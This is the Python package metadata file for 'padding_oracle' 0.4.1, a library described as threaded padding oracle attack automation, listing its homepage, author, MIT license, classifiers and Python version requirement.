Metadata-Version: 2.1
Name: padding_oracle
Version: 0.4.1
Summary: Threaded padding oracle automation.
Project-URL: Homepage, https://github.com/djosix/padding_oracle.py
Project-URL: Bug Tracker, https://github.com/djosix/padding_oracle.py/issues
Author-email: Yuankui Li <toregnerate@gmail.com>
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Topic :: Security :: Cryptography
Requires-Python: >=3.10
